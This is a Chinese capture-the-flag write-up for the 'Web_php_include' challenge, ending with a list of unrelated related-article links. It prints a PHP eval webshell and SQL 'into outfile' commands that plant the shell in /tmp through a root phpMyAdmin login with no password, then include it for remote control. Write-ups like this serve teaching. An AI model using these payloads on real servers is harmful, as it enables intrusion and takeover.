攻防世界   Web_php_include   write up

dirbuster  扫目录   发现phpinfo()可以看到绝对路径   和  phpmyadmin

进入phpmyadmin页面   root直接空密码登录

查看phpmyadmin变量 secure file priv 值为空  说明可以写入一句话

load_file()可以读取任意文件

.......在经过各种尝试写人一句话再用文件包含读取的过程中.发现权限有各种限制。
.......因为page可以直接包含phpinfo()页面显示,所以以phpinfo()为测试,测试到/tmp 目录可以写入,也可以包含读取。
    于是将一句话写入/tmp,菜刀链接文件包含页面,得到flag

<?php eval(@$_POST['flag']); ?>

select "<?php eval(@$_POST['flag']); ?>"into outfile '/var/lib/mysql/test1.php'  能写入,无法包含。
select "<?php eval(@$_POST['flag']); ?>"into outfile '/var/www/test1.php'  无法写入
............
...........
.......

select "<?php eval(@$_POST['flag']); ?>"into outfile '/tmp/test.php'  可以写入

http://111.198.29.45:36252/?page=/tmp/test.php 菜刀链接

....

转载于:https://www.cnblogs.com/Zhu013/p/11550463.html

攻防世界 Web_php_include write up相关推荐

  1. 攻防世界-Web_php_include

    分析: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, & ...

  2. CTF:攻防世界web PART01

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 攻防世界web PART01 baby_web Traini ...

  3. 攻防世界-web高手进阶区

    文章目录 攻防世界-web高手进阶区 1.baby_web 2.Training-WWW-Robots 3.Web_php_include (文件包含+伪协议) 1.方法 2.方法 4.ics-06( ...

  4. 【攻防世界001】Guess-the-Number

    攻防世界之前刷了几十题了,没写wp,感觉很简单没啥意思.后来参加了几次比赛,发现有点干不动,决定还是老老实实刷题好了.这是第一篇wp,这题很简单,是个jar,用jd-gui可以得到java源码. 原来 ...

  5. 攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制

    ctf(pwn) canary保护机制讲解 与 破解方法介绍 程序执行流程 有三个选项,1是利用栈溢出,2是利用格式化字符串,3是退出;可连续输入多次; IDA分析 解题思路 程序存在canary保护 ...

  6. 攻防世界(Pwn) forgot---栈溢出;(方法二)

    攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...

  7. 攻防世界(Pwn) forgot---栈溢出;(方法一)

    攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...

  8. 攻防世界misc新手_[攻防世界]mobile新手练习区easy-apk

    [攻防世界]mobile新手练习区easy-apk easy-apk最佳Writeup由129师386旅独立团 • devi1提供 难度系数: 7.0 题目来源: 暂无 题目描述:无 题目场景: 暂无 ...

  9. 攻防世界 ——crypto

    目录 新手区部分题解: 1,easy_RSA 2,Normal_RSA 3, 幂数加密 4,easy_ECC 高手进阶区部分题题解 5, ENC 6,告诉你个秘密 7,Easy-one 8,说我作弊需 ...

  10. 攻防世界———MISC 高手区题解

    目录 1,base64stego 2,easycap 3,Avatar 4,What-is-this 5,签到题 6,Training-Stegano-1 7,Excaliflag 8,Get-the ...

最新文章

  1. Tencent云联网灾备方案
  2. OLEDB IMEX行数限制的问题
  3. libevent源码学习-----event_base事件循环
  4. 大话synchronize底层原理
  5. 吃透这套架构演化图,从零搭建Web网站也不难
  6. [渝粤教育] 中国地质大学 电路理论(新) 复习题 (2)
  7. c语言dll创建线程,教大家写一个远程线程的DLL注入,其实还是蛮简单的……………………...
  8. 《Head First Servlets JSP》-11-Web应用部署
  9. SpringMvc源码入门
  10. 【优化调度】基于matlab求解共享储能电站工业用户日前经济调度优化问题【含Matlab源码 1103期】
  11. oracle误删数据恢复
  12. mac brew加速
  13. python的tkinter插入图片_如何用python tkinter插入显示图片?
  14. 253短信发送(国内短信)
  15. 纯电动汽车快慢充原理介绍
  16. antdv 表格标题换行
  17. 视频服务器信号转换器,DVI转换器
  18. SIM卡所能保存的联系人姓名长度研究。
  19. TPC-H系列---2---TPC-H表结构及表之间的关系
  20. fireBug网络面板数据说明(转)

热门文章

  1. python 通过逗号分割字符串_「Python 秘籍」使用多个界定符分割字符串
  2. hdu 4911 “Inversion”——逆序对问题
  3. java数组清空能释放jvm内存嘛_JVM面试题汇总
  4. 自增字段不连续_MySQL中自增主键不连续之解决方案。(20131109)
  5. kafka应用场景_从未如此简单:10分钟带你逆袭Kafka!
  6. 帝国7.2 php5.2,帝国CMS7.2版升级到7.5版的详细步骤方法(已测)
  7. 哈希存储:字符串存储、数字存储
  8. c语言 入字符要中文状态吗,常见的HTTP状态码深入理解
  9. 算法合集之《信息学中守恒法的应用》
  10. 计算机房采用c02采灭火,[灭火器使用.doc